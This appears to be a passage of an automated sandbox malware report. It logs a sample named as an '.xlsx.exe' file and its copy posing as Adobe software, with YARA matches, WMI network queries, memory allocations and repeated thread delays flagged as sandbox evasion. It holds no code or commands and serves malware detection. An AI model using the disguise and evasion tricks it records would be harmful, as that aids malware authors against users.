                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 3312, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory allocated: 32B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory allocated: 52B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory allocated: 98F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory allocated: A8F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory allocated: 98F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory allocated: D00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory allocated: 46E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 11C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 8CB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 9CB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 9EC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: AEC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 1680000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 32E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2BC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 4BC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 8ED0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 9ED0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: A0E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: B0E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 12A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2C90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2AE0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 240000Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239891Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239770Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239641Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239531Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239422Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239313Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239188Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239063Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238953Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238844Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238719Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238587Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238266Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238157Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238047Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599859Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599733Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599625Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599516Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599406Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599297Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599187Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599078Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598969Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598844Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598734Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598625Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598515Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598406Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598297Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598185Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598078Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597969Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597844Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597734Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597625Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597515Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597406Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597297Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597188Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597063Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596938Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596828Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596719Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596594Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596484Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596375Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596264Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596156Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596047Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595937Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595828Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595719Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595594Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595484Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595315Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595203Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595094Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594984Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594875Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594766Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594656Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594547Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594438Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 240000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239875Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239765Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239656Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239546Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239312Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239187Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239078Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599891Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599766Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599655Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599531Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599422Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599311Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599188Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599063Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598953Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598828Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598718Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598609Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598500Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598336Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598219Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598094Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597984Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597872Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597765Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597656Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597547Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597438Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597313Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597188Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597063Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596938Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596828Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596719Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596594Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596484Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596375Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596266Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596156Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596047Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595938Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595813Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595703Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595594Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595469Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595344Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595234Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595125Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595016Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594891Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594766Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594649Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594546Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594436Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594328Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 240000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239843Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239733Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239625Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239513Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239406Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239296Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239177Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599889
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599672
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599563
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599438
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599313
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599188
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599078
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598969
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598844
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598735
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598610
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598485
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598360
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598235
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598110
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597985
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597860
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597735
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597610
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597485
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597360
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597235
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597110
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596985
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596860
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596735
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596610
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596485
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596360
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596235
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596110
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595985
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595860
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595735
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595610
